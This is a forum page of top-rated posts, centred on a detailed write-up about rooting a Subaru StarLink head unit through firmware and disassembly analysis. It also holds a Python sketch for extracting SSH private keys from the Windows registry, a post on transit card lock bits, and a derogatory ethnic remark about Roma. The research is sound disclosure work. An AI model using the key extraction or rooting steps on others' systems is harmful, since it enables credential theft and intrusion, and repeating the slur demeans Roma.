
Leaderboard

Popular Content

Showing content with the highest reputation on 02/17/19 in all areas

  1. We are like brothers. Avoid Gypsies. Romania has more Gypsies than Romanians. :)))))
    5 points
  2. 1985 - 2018: https://kskedlaya.org/putnam-archive/ 1938 - 1985: https://mks.mff.cuni.cz/kalva/putnam.html For enthusiasts.
    2 points
  3. Using OpenSSH natively in Windows is awesome since Windows admins no longer need to use Putty and PPK formatted keys. I started poking around and reading up more on what features were supported, and was pleasantly surprised to see ssh-agent.exe is included. tl;dr: Private keys are protected with DPAPI and stored in the HKCU registry hive. I released some PoC code here to extract and reconstruct the RSA private key from the registry Source: https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent/
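For illustration, here is a minimal sketch of that extraction idea in Python, assuming pywin32 is installed and that the blobs live under a per-key subtree of HKCU (the exact registry path and value names are assumptions taken from the linked write-up, not from this post); the released PoC goes further and rebuilds the full RSA private key from the decrypted blob.

# Hypothetical sketch: enumerate ssh-agent key blobs under HKCU and DPAPI-unprotect
# them in the owning user's context. Registry path and value names are assumptions.
import winreg
import win32crypt  # pywin32

AGENT_KEYS = r"Software\OpenSSH\Agent\Keys"  # assumed location of the saved keys

with winreg.OpenKey(winreg.HKEY_CURRENT_USER, AGENT_KEYS) as keys:
    for i in range(winreg.QueryInfoKey(keys)[0]):
        name = winreg.EnumKey(keys, i)
        with winreg.OpenKey(keys, name) as k:
            blob, _ = winreg.QueryValueEx(k, "")            # default value: DPAPI blob
            comment, _ = winreg.QueryValueEx(k, "comment")  # assumed value name
        # CryptUnprotectData returns a (description, plaintext_bytes) tuple
        _, key_material = win32crypt.CryptUnprotectData(blob, None, None, None, 0)
        print(f"{name} ({comment}): {len(key_material)} bytes of key material")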
    2 points
  4. Romania on a motorbike is a bad idea dude. Bad roads, stupidly placed or nonexistent road signs and full of morons with a driving license. If you value your life and health, go the opposite way, to Croatia or even Italy.
    1 point
  5. It's possible this is a dead end. I don't know how smart those machines and the backend software are, but I think they made a small change to check bit 3 of LOCK (the one associated with the OTP area), so that if it's set to read-only the machine throws an error. The vulnerability is known even to them, and implementing a check like that wouldn't be much of a problem if the machines are reprogrammable or communicate with a server. The data on that card also includes route information. There used to be an Android app that could read it, but I don't know if you can still find it. In any case, what you're looking for, and probably what you're trying to accomplish, constitutes a criminal offense regardless of whether your intentions are good or not.
    1 point
  6. Synopsis: CarHacking.Tools is a script I built to help people who are interested in exploring car hacking and research get a quick start. I decided to invest the time into building this script after spending many hours finding, installing, and configuring the available tools, and very little time actually "hacking" a car. Link: https://carhacking.tools/
    1 point
  7. Read the fucking date on the post before you write something
    1 point
  8. Jailbreaking Subaru StarLink Another year, another embedded platform. This exercise, while perhaps less important than the medical security research I've worked on the past, is a bit more practical and entertaining. What follows is a technical account of gaining persistent root code execution on a vehicle head unit. Table of Contents Jailbreaking Subaru StarLink Table of Contents Introduction Shared Head Unit Design Existing Efforts SSH Finding the Manufacturer Harman and QNX Dr. Charlie Miller & Chris Valasek's Paper First Recap Analysis of Attack Surfaces USB Update Mechanism On My Warranty Hardware Analysis Board Connectors Serial Port Installing the Update Firmware swdl.iso IFS Files ifs-subaru-gen3.raw Contents Files of Note minifs.ifs Contents ISO Modification Reverse Engineering QNXCNDFS installUpdate Flow cdqnx6fs Cluster Table Cluster Data Decrypting Key Generation Emulation Cluster Decryption Cluster Decompression Mounting the Image The Extents Section Understanding the Extents Final Decompression system.dat ifs_images Back to QNXCNDFS The Shadow File Non-privileged Code Execution Image Creation Root Escalation Backdooring SSH Putting it All Together CVE-2018-18203 Next Steps Notes from Subaru and Harman Note from Subaru Note from Harman Conclusion Introduction Back in June, I purchased a new car: the 2018 Subaru Crosstrek. This vehicle has an interesting head unit that's locked down and running a proprietary, non-Android operating system. Let's root it. If this was Android, we could most likely find plenty of pre-existing PoCs and gain root rather trivially as most vehicle manufacturers never seem to update Android. Because this isn't an old Android version, we'll have to put a little more work in than usual. Shared Head Unit Design In 2017, Subaru launched a new version of their StarLink head unit on the Impreza. The same head unit appears to be used on the 2018+ Crosstrek, as well as the latest Forester and Ascent. If we can root the base device, we can potentially root every head unit on every vehicle sharing the same platform. There are a few SKUs for the head units on the Crosstrek and Impreza. The cheapest model has a 6-inch screen. A higher trim model has an 8-inch screen, and the top of the line model has the 8-inch screen as well as an embedded GPS mapping system. All models support Apple Carplay and Android Auto. The 8-inch models can connect to WiFi networks and theoretically download firmware updates wirelessly, but this functionality doesn't seem to be in use yet. Existing Efforts Starting from scratch, we know virtually nothing about the head unit. There are no obvious debugging menus, no firmware versions listed anywhere, and no clear manufacturer. First, we need to research and find out if anyone else has already accomplished this or made any progress understanding the unit. The only useful data was posted by redditor nathank1989. See his post in /r/subaruimpreza, and, more importantly, the replies. To quote his post: SSH Into STARLINK Just got myself the 2017 Impreza Sport and can see there's an open SSH server. Kudos to the person who knows what is or how to find the root user and password. 2 hours of googling has yielded nothing. SSH is a good sign — we're mostly likely running some sort of Unix variant. Further down in the Reddit post, we have a link to a firmware update. This will save us time as getting access to a software update is sometimes quite difficult with embedded systems. Subaru later took this firmware update down. 
They had linked to it from the technical service manuals you can purchase access to through Subaru. It appears that Subarunet did not require any form of authentication to download files originally. I did not get the files from this link as they were down by the time I found the thread, but, the files themselves had been mirrored by many Subaru enthusiasts. These files can be placed on a USB thumb drive, inserted into the vehicle's USB ports, and the firmware installed on the head unit. Aside from this, there really isn't much information out there. SSH What happens if we connect to SSH over WiFi? ****************************** SUBARU ******************************* Warning - You are knowingly accessing a secured system. That means you are liable for any mischeif you do. ********************************************************************* root@192.168.0.1's password: Dead end. Brute forcing is a waste of time and finding an exploit that would only work on the top tier of navigation models with WiFi isn't practical. Finding the Manufacturer We can find the manufacturer (Harman) in several different ways. I originally discovered it was Harman after I searched several auction sites for Subaru Impreza head units stripped out of wrecked vehicles. There were several for sale that had pictures showing stickers on the removed head unit with serial numbers, model numbers, and, most importantly, the fact that Harman manufacturers the device. Another way would be to remove the head unit from a vehicle, but I'm not wealthy enough to void the warranty on a car I enjoy, and I've never encountered a dash that comes out without tabs breaking. The technical manuals you can pay for most likely have this information as well as the head unit pinout. Hidden debug and dealer menus are accessible via key combinations. One of these menus hints that the device is running QNX and is from Harman. See another useful Reddit post by ar_ar_ar_ar. From the debug menu, we know we're running QNX 6.60. Harman and QNX Now that we know the manufacturer and OS, we can expand the search a bit. There are a few interesting publications on Harman head units, and one of them is both useful and relatively up-to-date. Dr. Charlie Miller & Chris Valasek's Paper Back in 2015, Dr. Charlie Miller and Chris Valasek presented their automotive research at Blackhat: Remote Exploitation of an Unaltered Passenger Vehicle. This is, by far, the best example of public research on Harman head units. Thank you to Dr. Miller and Chris for publishing far more details than necessary. The paper covers quite a few basics of Harman's QNX system and even shows the attacks they used to gain local code execution. Although the system has changed a bit since then, it is still similar in many ways and the paper is well worth reviewing. First Recap At this point, we know the following: This is a Harman device. It is running QNX 6.60. We have a firmware image. Analysis of Attack Surfaces Where do we begin? We can attack the following systems, listed by approximate difficulty, without having to disassemble the vehicle: Local USB Update Mechanism USB Media Playback (metadata decoding?) OBD? iPod Playback Protocol Carplay/Android Auto Interfaces CD/DVD Playback & Metadata Decoding Wireless WiFi Bluetooth FM Traffic Reception / Text Protocols There are more vectors, but attacking them often isn't practical at the hobbyist level. 
USB Update Mechanism The biggest attack vector (but not necessarily the most important) on a vehicle head unit is almost always the head unit software update mechanism. Attackers need a reliable way to gain access to the system to explore it for other vulnerabilities. Assuming it can be done, spoofing a firmware update is going to be a much more "global" rooting mechanism than any form of memory corruption or logic errors (barring silly mistakes like open Telnet ports/DBUS access/trivial peek/poke etc.). Thus, finding a flaw like this would be enormously valuable from a vulnerability research perspective. On My Warranty If we’re going to start attacking an embedded system, we probably shouldn’t attack the one in a real, live vehicle used to drive around town. More than likely nothing bad would happen assuming correct system design and architecture (a safe assumption?), but paying to have the dealer replace the unit would be very expensive. This could also potentially impact the warranty, which could be cost-prohibitive. Auction sites have plenty of these for sale from salvage yards for as low as $200. That's a fantastic deal for a highly proprietary system with an OEM cost of more than $500. Hardware Analysis Before we look at the firmware images we grabbed earlier, let's evaluate the hardware platform. This is pretty standard for embedded systems. First, figure out how to power on the system. We need a DC power supply for the Subaru head unit as well as the wiring diagram for the back of the unit in order to know what to attach the power leads to. I didn't feel like paying the $30 for access to the technical manual, so I searched auction sites for a while, eventually found a picture of the wiring harness, noted that the harness had one wire that was much thicker than the others, guessed that was probably power, attached the leads, prayed, and powered the unit on. I don't recommend doing that, but it worked this time. Next, disassemble the device and inventory the chips on the system. Important parts: ARM processors. USB ports. (correspond to the USB ports in the car for iPhone attachment etc) Unpopulated orange connectors. (Interesting!) 32GB eMMC. The eMMC is a notable attack vector. If we had unlimited time and money, dump the contents via attaching test points to nearby leads else by desoldering the entire package. Unfortunately, I don't have the equipment for this. At minimum I'd want a rather expensive stereo microscope, and that isn't worth the cost to me. One could potentially root the device by desoldering, dumping, modifying a shadow file, reflashing, and resoldering. A skilled technician (i.e. professional attacker) in a well-equipped lab could do this trivially. Board Connectors There are strange looking orange connectors with Kapton tape covering them. How do we find the connectors so we can easily probe the pins? We could trawl through tiny, black and white DigiKey pictures for a while and hopefully get lucky, but asking electronics.stackexchange.com is far simpler. I posted the question and had many members helpfully identify the connector as Micromatch in less than an hour. Fantastic. Order cable assemblies from DigiKey, attach them, then find the 9600 or 115200 baud serial port every embedded system under the sun always has. Always. 
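Once the cable assemblies are attached, a quick way to hunt for that console is to open each candidate pin pair at the common baud rates and watch for boot chatter. A rough pyserial sketch, where the adapter path and the two baud rates tried are assumptions rather than values confirmed for this board:

# Hypothetical probe: listen on a USB-serial adapter at the two usual baud rates
# and dump whatever the head unit prints while it boots.
import serial  # pyserial

for baud in (115200, 9600):
    print(f"--- listening at {baud} baud ---")
    with serial.Serial("/dev/ttyUSB0", baudrate=baud, timeout=2) as port:
        for _ in range(50):
            line = port.readline()
            if line:
                print(line.decode("ascii", errors="replace").rstrip())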
Serial Port SUBARU Base, date:Jul 11 2017 Using eMMC Boot Area loader in 79 ms �board_rev = 6 Startup: time between timer readings (decimal): 39378 useconds Welcome to QNX 660 on Harman imx6s Subaru Gen3 ARM Cortex-A9 MPCore login: RVC:tw9990_fast_init: Triggered TW9990 HW Reset RVC:tw9990_fast_init: /dev/i2c4 is ready WFDpixel_clock_kHz: 29760 WFDhpixels: 800 WFDhfp: 16 WFDhsw: 3 WFDhbp: 45 WFDvlines: 480 WFDvfp: 5 WFDvsw: 3 WFDvbp: 20 WFDflags: 2 RVC:tw9990_fast_init: Decoder fast init completed [Interrupt] Attached irqLine 41 with id 20. [Interrupt] Attached irqLine 42 with id 21. root root Password: Login incorrect Serial has a username and password. A good guess is that it's using the exact same credentials as the SSH server. Another dead end. At this point I tried breaking into some form of bootloader on boot via keystrokes and grounding various chips, but no luck. There are other pins, so we could look for JTAG, but since we have a firmware update package, let's investigate that first. JTAG would involve spending more money, and part-time embedded security research isn't exactly the most lucrative career choice. Installing the Update To install the update, we first need to solder on a USB socket so we can insert a flash drive into the test setup. Subaru seems to sell these cables officially for around 60$. The cheaper way is to splice a USB extension cord and solder the four leads directly to the board. After doing this step, the system accepts the downloaded update. The device I purchased from a salvage yard actually had a newer firmware version than the files I got from various Subaru forums. The good news is that the system supports downgrading and does not appear to reject older firmwares. It also happily reinstalls the same firmware version on top of itself. Now onto the firmware analysis stage. Firmware Here's what the update package has: BASE-2017MY Impreza Harman Audio Update 06-2017/update/KaliSWDL$ ls -lash total 357M 0 drwxrwxrwx 1 work work 4.0K Jun 7 2017 . 0 drwxrwxrwx 1 work work 4.0K Jun 7 2017 .. 4.0K -rwxrwxrwx 1 work work 1.8K Jun 7 2017 checkswdl.bat 44K -rwxrwxrwx 1 work work 43K Jun 7 2017 KaliSWDL.log 784K -rwxrwxrwx 1 work work 782K Jun 7 2017 md5deep.exe 167M -rwxrwxrwx 1 work work 167M Jun 7 2017 swdl.iso 0 -rwxrwxrwx 1 work work 48 Jun 7 2017 swdl.iso.md5 86M -rwxrwxrwx 1 work work 86M Jun 7 2017 swupdate.dat 104M -rwxrwxrwx 1 work work 104M Jun 7 2017 system.dat checkswdl.bat - Checks the md5sum of swdl.iso and compares it with swdl.iso.md5. Prints a nice pirate ship thumbs-up on a successful verification, else a pirate flag on failure. _@_ ((@)) ((@)) ((@)) ______===(((@@@@====) ##########@@@@@=====)) ##########@@@@@----)) ###########@@@@----) ========----------- !!! FILE IS GOOD !!!! At first, I thought the only signature checking on the update was a md5 sum we could modify in the update folder. Thankfully, that assumption was incorrect. KaliSWDL.log - Build log file. This doesn't look like it needs to be included with the update package. My guess is that it is just a build artifact Harman didn't clean up. VARIANT : NAFTA LOGFILE : F:\Perforce\Jenkins\Slave\workspace\Subaru_Gen3_Release_Gen3.0\project\build\images\KaliSWDL\KaliSWDL.log MODELYEAR : MY2017 BUILD VERSION : Rel2.17.22.20 BUILD YEAR : 17 BUILD WEEK : 22 BUILD PATCH : 20 BUILD TYP : 1 BUILD BRANCH : Rel BUILD VP : Base The system cannot find the file specified. The system cannot find the file specified. The system cannot find the file specified. The system cannot find the file specified. 
- BuildType - 1 - Build Branch - Rel - Build Version Year - 17 - Build version Week - 22 - Build Version Patch - 20 - Model Year - MY2017 - Market - NA - Market - NA - VP - Base - Salt - 10 swdl.iso - ISO file containing lots of firmware related files. Guessing the ISO format was left over from older Harman systems where firmware updates were burned onto CDs. dat files - swupdate.dat and system.dat are high entropy files with no strings. Almost certainly encrypted. Only useful piece of information in the file is "QNXCNDFS" right at the beginning. Search engines, at the time I first looked at this, had no results for this filetype. My guess was that it was custom to Harman and/or QNX. $ hexdump -Cv -n 96 swupdate.dat 00000000 51 4e 58 43 4e 44 46 53 01 03 01 00 03 00 00 00 |QNXCNDFS........| 00000010 00 c0 ff 3f 00 00 00 00 8c 1d 5e 05 00 00 00 00 |...?......^.....| 00000020 00 a4 07 0c 00 00 00 00 00 02 00 00 00 00 00 00 |................| 00000030 80 02 00 00 00 00 00 00 90 0e 00 00 00 00 00 00 |................| 00000040 04 00 00 00 00 00 00 00 c1 00 00 00 00 00 00 00 |................| 00000050 00 00 10 00 00 80 10 00 04 00 00 00 04 00 00 00 |................| As the dat files look encrypted, starting with the ISO file makes the most sense. swdl.iso The ISO contains many files. More build artifacts with logs from the build server, what look like bootloader binary blobs, several QNX binaries with full debug symbols we can disassemble, one installation shell-script and, most importantly, IFS files. $ file softwareUpdate softwareUpdate: ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), dynamically linked, interpreter /usr/lib/ldqnx.so.2, BuildID[md5/uuid]=381e70a72b349702a93b06c3f60aebc3, not stripped IFS Files QNX describes IFS as: An OS image is simply a file that contains the OS, plus any executables, OS modules, and data files that are needed to get the system running properly. This image is presented in an image filesystem (IFS). Thus, IFS is a binary format used by QNX. The only other important information to note here is that we can extract them with tools available on github. See dumpifs. ifs-subaru-gen3.raw Contents Running dumpifs on ifs-subaru-gen3.raw gets us this: Decompressed 1575742 bytes-> 3305252 bytes Offset Size Name 0 8 *.boot 8 100 Startup-header flags1=0x9 flags2=0 paddr_bias=0 108 52008 startup.* 52110 5c Image-header mountpoint=/ 5216c 1994 Image-directory ---- ---- Root-dirent 54000 8e000 proc/boot/procnto-instr e2000 16f4 proc/boot/.script e4000 521 bin/.kshrc e5000 2e6 bin/boot.sh e6000 10d bin/mountMMC0.sh e7000 63 bin/umountMMC0.sh e8000 6b bin/mountUSB.sh e9000 2b9 bin/mountUSBUpdate.sh ea000 6d6 bin/startUpdate.sh Lots of base operating system files. We can extract most of them via dumpifs -bx ifs-subaru-gen3.raw. 
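If you want to script that across every image in the ISO, something along these lines works; this is only a convenience wrapper, and it assumes dumpifs is on PATH and extracts into the current working directory, which is worth verifying against the tool itself.

# Convenience wrapper (assumption-laden): run `dumpifs -bx` on every IFS/raw image
# found under the mounted ISO and collect the extracted files per image.
import pathlib
import subprocess

iso_root = pathlib.Path("swdl")       # assumed mount point of swdl.iso
out_root = pathlib.Path("extracted")

for pattern in ("*.ifs", "*.raw"):
    for image in iso_root.rglob(pattern):
        out_dir = out_root / image.stem
        out_dir.mkdir(parents=True, exist_ok=True)
        # assumes dumpifs drops extracted files into the current working directory
        subprocess.run(["dumpifs", "-bx", str(image.resolve())], cwd=out_dir, check=True)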
$ ls authorized_keys ftpd.conf libtracelog.so.1 shadow banner ftpusers ln slay Base.pub getconf login sleep boot.sh gpio.conf lsm-pf-v6.so slogger2 cam-disk.so group mount spi-master cat hosts mount_ifs spi-mx51ecspi.so checkForUpdate.sh i2c-imx mountMMC0.sh sshd_config cp ifs-subaru-gen3.raw mountUSB.sh ssh_host_dsa_key devb-sdmmc-mx6_generic img.conf mountUSBUpdate.sh ssh_host_key devc-pty inetd.conf mv ssh_host_rsa_key devc-sermx1 init.sh NAFTA.pub startNetwork.sh dev-ipc io passwd startRvc.sh dev-memory io-blk.so pf.conf startUpdate.sh dev-mmap ipl-subaru-gen3.bin pf.os SubaruPubkey.pmem earlyStartup.sh ksh pipe symm.key echo libcam.so.2 prepareEMMCBootArea.sh sync eMMCFactoryFormat.sh libc.so.3 procnto-instr touch eMMCFormat.sh libdma-sdma-imx6x.so.1 profile umount enableBootingFromEMMCBootArea.sh libfile.so.1 rm umountMMC0.sh fram.conf libslog2parse.so.1 scaling.conf uname fs-dos.so libslog2shim.so.1 scaling_new.conf updateIPLInEMMCBootArea.sh fs-qnx6.so libslog2.so.1 services waitfor This clearly isn't even close to all of the files the system will use to boot and launch the interface, but it's a start. Files of Note authorized_keys - key for sshd. Probably how Harman engineers can login over SSH for troubleshooting and field support. banner - sshd banner we see when we connect over WiFi. This indicates that we're looking at the right files. sshd_config - AllowUsers root, PasswordAuthentication yes, PermitRootLogin yes, Wow! passwd: root:x:0:0:Superuser:/:/bin/sh daemon::1:2:daemon:/: dm::2:8:dwnmgr:/: ubtsvc:x:3:9:bt service:/: logger:x:101:71:Subaru Logger:/home/logger:/bin/sh certifier:x:102:71:Subaru Certifier:/home/certifier:/bin/sh shadow - Password hashes for root and other accounts. QNX6 hashtype is supported by JTR (not hashcat as far as I am aware), but doesn't appear to be GPU accelerated. I spent several days attempting a crack on a 32-core system using free CPU credits I had from one of the major providers, but without GPU acceleration, got nowhere. As long as they made the password decently complicated, there isn't much we can do. startnetwork.sh - Starts "asix adapter driver" then loads a DHCP client. AKA we can buy a cheap USB to Ethernet adapter, plug it into the head unit's USB ports, and get access to the vehicles internal network. This allows us access to sshd on base units that do not have the wireless chipset. This is almost certainly how Harman field engineers troubleshoot vehicles. We can verify this works by buying an ASIX adapter, plugging it in, powering up the head unit, watching traffic on Wireshark, and seeing the DHCP probes. symm.key - Clearly a symmetric key. Obvious guess is the key that decrypts the .dat files. Perfect. minifs.ifs Contents There are other IFS files included in the ISO. miniifs seems to contain most of the files used during the software update process. Almost every command line binary on the system has handy help descriptions we can get via strings: %C softwareUpdate Usage => -------- To Start Service installUpdate -c language files -l language id -i ioc channel name ( e.g. /dev/ioc/ch4) -b If running on Subaru Base Variant -p pps path to platform features, e.g /pps/platform/features -r config file path for RH850 Binary mapping e.g)# installUpdate & or # e.g) # installUpdate -l french_fr &NAME=installUpdate DESCRIPTION=installUpdate There are too many files to note here, but a few stand out: andromeda - An enormous 17MB-20MB binary blob that seems to run the UI and implement most of the head unit functionality. 
Looks to make heavy use of QT. installUpdate - Installs update files. installUpdate.sh - Shell script that triggers the update. Unknown who or what calls this script. So, installUpdate.sh executes this at the end: echo " -< Start of InstallUpdate Service >- " installUpdate -c /fs/swMini/miniFS/usr/updatestrings.json -b postUpdate.sh What's in updatestrings.json? "SWDL_USB_AUTHENTICATED_FIRST_SCREEN": "This update may take up to 60 minutes to<br>complete. Please keep your vehicle running<br>(not Accessory mode) throughout the entire<br>installation.", "SWDL_USB_AUTHENTICATED_SECOND_SCREEN": "If you update while your vehicle is idling,<br>please make sure that your vehicle<br>is not in an enclosed spa ce such as a<br>garage.", "SWDL_USB_AUTHENTICATED_THIRD_SCREEN": "The infotainment system will be temporarily<br>unavailable during the update.<br>Current Version: %s<br>Availab le Version: %s<br>Would you like to install now?", "SWDL_USB_AUTHENTICATED_THIRD_SCREEN_SAME_IMAGE": "The infotainment system will be temporarily<br>unavailable", The file contains the same strings shown to the user through the GUI during the software update process. Hence, installUpdate is almost certainly the file we want to reverse engineer to understand the update process. Remember the encrypted dat files with the QNXCNDFS header? Let's see if any binaries reference that string. $ ag -a QNXCNDFS Binary file cdqnx6fs matches. Binary file cndfs matches. $ strings cndfs %C - condense / restore Power-Safe (QNX6) file-systems %C -c [(general-option | condense-option)...] src dst %C -r [(general-option | restore-option)...] src dst General options: -C dll specify cache-control DLL to use with direct I/O -f force use of direct I/O, even if disk cache cannot be discarded -I use direct I/O for reading data -k key specify the key to use for data encryption / decryption. <key> must be a string of hexadecimal digits, optionally separated by punctuation characters. -K dll[,args] specify a DLL to provide the key to use for data encryption or decryption. Optionally, an arguments string can be added which will be passed to the key provider function. See below. -O use direct I/O for writing data -p name store progress information in shared-memory object <name> -s size specify the chunk size [bytes] (default: 1M) -S enable synchronous direct I/O. This should cause io-blk to discard cached blocks on direct I/O, which may reduce performance. Default is to try and discard the cache for the entire device before any I/O is performed (see -f option). -v increase verbosity -? print this help Condense-options: -b size specify the raw block size for compression [bytes] (default: 64k) -c condense file-system <src> into file <dst> -d num specify the data hashing method. <num> must be in the range 0..7 (default: 4). See below for supported methods. -D deflate data -h num specify the header hashing method. <num> must be in the range 0..6 (default: 4). See below for supported methods. -m num specify the metadata hashing method. <num> must be in the range 0..6 (default: 4). See below for supported methods. Restore-options: -r restore file-system <dst> from condensed file <src> -V verify written data during restoration Where: src is the source file / block device dst is the destination file / block device Hash methods: 0 = none 1 = CRC32 2 = MD5 3 = SHA224 4 = SHA256 5 = SHA384 6 = SHA512 7 = AES256-GCM (encrypts; requires 256-bit key) It appears that cndfs/cdqnx6fs can both encrypt/decrypt our dat files, and CNDFS stands for "condensed" filesystem. 
The help message also lets us know that it is almost certainly encrypted with AES256-GCM, uses a 256-bit key, and may be compressed. Unfortunately, we'd need code execution to run this. ISO Modification The most logical first attack is to modify the ISO. We can verify this method is impossible by changing a single byte in the image and trying to install it. On USB insertion, the device probes for certain files on the USB stick. If it finds files that indicate an update, it will claim that it is verifying the integrity of the files (although it actually doesn't do this until reboot, strange!), print a "success" message, reboot into some form of software-update mode, then actually checks the integrity of the ISO. Only the ISO header appears to be signed, but the header contains a SHA hash of the rest of the ISO. Installation will only continue if the header and SHA hashes validate. Barring a mistake in the signature verification subroutines, we will be unable to modify the ISO for trivial code execution. At this point we've extracted a large number of relevant files from the update package. The files appear to be specific to the early boot process of the device and a specific update mode. We don't yet know what is contained in the encrypted dat files. Reverse Engineering QNXCNDFS As code execution via ISO modification is unfortunately (fortunately?) not trivial, the next step is to decrypt the condensed dat file. Ideally the encrypted files contain some form of security sensitive functionality — i.e. perhaps debug functionality we can abuse on USB insertion. Plenty of embedded systems trigger functionality and debug settings when specific files are loaded onto USB drives and inserted, so we can hope for that here. At worst, we will most likely gain access to more system files we can investigate for rooting opportunities. QNXCNDFS is a custom image format with no known information available on the Internet, so we'll start from scratch with the installUpdate binary. We know that cndfs or cdqnx6fs are probably involved as they contain the QNXCNDFS string, but how do they get called? installUpdate Flow First, find any references to the cdqnx6fs or cndfs files in installUpdate. It probably gets called here: LOAD:0805849C ; r0 is key? 
LOAD:0805849C LOAD:0805849C dat_spawn_copy_directory ; CODE XREF: check_hash_copy+CA↓p LOAD:0805849C LOAD:0805849C var_28 = -0x28 LOAD:0805849C var_24 = -0x24 LOAD:0805849C var_20 = -0x20 LOAD:0805849C var_1C = -0x1C LOAD:0805849C var_18 = -0x18 LOAD:0805849C var_14 = -0x14 LOAD:0805849C LOAD:0805849C 70 B5 PUSH {R4-R6,LR} LOAD:0805849E 0C 46 MOV R4, R1 LOAD:080584A0 86 B0 SUB SP, SP, #0x18 LOAD:080584A2 0E 49 LDR R1, =aCopyDirectoryC ; "Copy Directory Command " LOAD:080584A4 06 46 MOV R6, R0 LOAD:080584A6 0E 48 LDR R0, =_ZSt4cout ; std::cout LOAD:080584A8 15 46 MOV R5, R2 LOAD:080584AA FC F7 9D FA BL _ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc ; std::operator<<<std::char_traits<char>>(std::basic_ostream<char,std::char_traits<char>> &,char const*) LOAD:080584AE FC F7 6B FA BL sub_8054988 LOAD:080584B2 0C 4B LDR R3, =aR ; "-r" LOAD:080584B4 04 36 ADDS R6, #4 LOAD:080584B6 03 94 STR R4, [SP,#0x28+var_1C] LOAD:080584B8 02 96 STR R6, [SP,#0x28+var_20] LOAD:080584BA 01 20 MOVS R0, #1 LOAD:080584BC 00 93 STR R3, [SP,#0x28+var_28] LOAD:080584BE 0A 4B LDR R3, =aK ; "-k" LOAD:080584C0 04 95 STR R5, [SP,#0x28+var_18] LOAD:080584C2 0A 4A LDR R2, =(aFsSwminiMinifs_10+0x16) ; "cdqnx6fs" LOAD:080584C4 01 93 STR R3, [SP,#0x28+var_24] LOAD:080584C6 00 23 MOVS R3, #0 LOAD:080584C8 05 93 STR R3, [SP,#0x28+var_14] LOAD:080584CA 09 4B LDR R3, =off_808EA34 LOAD:080584CC D3 F8 94 10 LDR.W R1, [R3,#(off_808EAC8 - 0x808EA34)] ; "/fs/swMini/miniFS/bin/cdqnx6fs" LOAD:080584D0 08 4B LDR R3, =(aSCSIV+0xC) ; "-v" LOAD:080584D2 F9 F7 E0 E9 BLX spawnl LOAD:080584D6 06 B0 ADD SP, SP, #0x18 LOAD:080584D8 70 BD POP {R4-R6,PC} LOAD:080584D8 ; End of function dat_spawn_copy_directory spawnl creates a child process, so this seems like the correct location. If we look at the caller of dat_spawn_copy_directory, we find ourselves near code verifying some form of integrity of a dat file. LOAD:080586BC loc_80586BC ; CODE XREF: check_hash_copy+2E↑j LOAD:080586BC ; check_hash_copy+8E↑j LOAD:080586BC 20 6D LDR R0, [R4,#0x50] LOAD:080586BE 29 46 MOV R1, R5 LOAD:080586C0 3A 46 MOV R2, R7 LOAD:080586C2 04 F0 80 F8 BL check_dat_hash LOAD:080586C6 01 28 CMP R0, #1 LOAD:080586C8 81 46 MOV R9, R0 LOAD:080586CA 06 D1 BNE loc_80586DA LOAD:080586CC LOAD:080586CC invalid_dat_file ; CODE XREF: check_hash_copy+40↑j LOAD:080586CC 2E 49 LDR R1, =aIntrusionDetec ; "Intrusion detected: Invalid dat file!!!" LOAD:080586CE 2B 48 LDR R0, =_ZSt4cout ; std::cout LOAD:080586D0 FC F7 8A F9 BL _ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc ; std::operator<<<std::char_traits<char>>(std::basic_ostream<char,std::char_traits<char>> &,char const*) LOAD:080586D4 FC F7 58 F9 BL sub_8054988 LOAD:080586D8 41 E0 B loc_805875E check_dat_hash doesn't actually verify the dat files — instead, it verifies the ISO contents hash to a value that is in the ISO header. This is relatively easy to discover as the function does a fseek to 0x8000 right at the start. LOAD:0805C850 4F F4 00 41 MOV.W R1, #0x8000 ; off LOAD:0805C854 2A 46 MOV R2, R5 ; whence LOAD:0805C856 F4 F7 66 EE BLX fseek LOAD:0805C85A 78 B1 CBZ R0, loc_805C87C LOAD:0805C85C 04 21 MOVS R1, #4 LOAD:0805C85E 05 22 MOVS R2, #5 LOAD:0805C860 32 4B LDR R3, =aFseekFailedToO ; "Fseek failed to offset 32768" What is 0x8000? The ISO 9660 filesystem specifies that the first 0x8000 bytes are "unused". Harman appears to use this section for signatures and other header information. Thus, installUpdate is seeking past this header, then hashing the rest of the ISO contents to verify integrity. 
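In other words, the check boils down to hashing everything after the 32 KB system area and comparing the result with a value stored in the signed header. A rough Python equivalent of that walk, with SHA-256 assumed (the exact digest and where the expected value sits in the header are not confirmed here):

# Rough re-implementation of the integrity walk installUpdate appears to do:
# skip the 0x8000-byte ISO system area, then hash the remainder of swdl.iso.
import hashlib

HEADER_SIZE = 0x8000  # ISO 9660 "unused" system area, repurposed by Harman

def iso_payload_digest(path):
    h = hashlib.sha256()  # assumed; the binary only tells us it is "a SHA hash"
    with open(path, "rb") as f:
        f.seek(HEADER_SIZE)
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()

print(iso_payload_digest("swdl.iso"))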
The header is signed and contains the comparison hash, so we cannot just modify the ISO header hash to modify the ISO as we'd also need to re-sign the file. That would require Harman's private key, which we obviously don't have. Before installUpdate calls into the QNXCNDFS functionality, the system needs to successfully verify the ISO signature. Easy enough, we already have a valid update that is signed. cdqnx6fs Start by looking at the cdqnx6fs strings. This handy string pops out: Source: '%s' %s Destination: '%s' %s Chunk size: %u bytes Raw chunk size: %u bytes Max raw blk length: %u bytes Max cmp blk length: %u bytes Extents per chunk: %u Condensed file information: Signature: 0x%08llx Version: 0x%08x Flags: 0x%08x Compressed: %s File size: %llu bytes Number of extents: %llu Header hash method: %s Payload data: %llu bytes Header hash: %s Metadata hash method: %s Metadata hash: %s Data hash method: %s Data hash: %s File system information: File system size: %llu bytes Block size: %u bytes Number of blocks: %u Bitmap size: %u bytes Nr. of used blocks: %u On execution, the application prints out a large amount of header data. If we go to the function printing this string, the mapping between the header and the string prints becomes clear. LOAD:0804AA8C 4D F2 1C 10+ MOV R0, #aCondensedFileI ; "Condensed file information:" LOAD:0804AA94 FF F7 96 E9 BLX puts LOAD:0804AA98 BB 68 LDR R3, [R7,#0x18+var_10] LOAD:0804AA9A D3 E9 00 23 LDRD.W R2, R3, [R3] LOAD:0804AA9E 4D F2 38 10+ MOV R0, #aSignature0x08l ; " Signature: 0x%08llx\n" LOAD:0804AAA6 FF F7 3A E9 BLX printf 